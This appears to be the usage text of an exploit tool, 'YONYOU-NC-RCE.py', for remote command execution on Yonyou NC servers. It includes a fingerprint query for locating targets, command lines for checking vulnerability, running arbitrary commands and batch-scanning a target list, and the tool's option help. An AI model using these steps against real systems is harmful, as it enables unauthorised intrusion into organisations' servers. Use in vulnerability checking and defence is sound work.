title="YONYOU NC"
icon_hash="1085941792"
python ./YONYOU-NC-RCE.py -u https://www.example.com --check
python ./YONYOU-NC-RCE.py -u https://www.example.com --cmd "ls -la"
python ./YONYOU-NC-RCE.py -f target.txt
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Start scanning url
-f FILE, --file FILE read the url from the file
--check Check if vulnerable
--cmd CMD execute cmd (i.e: "ls -l")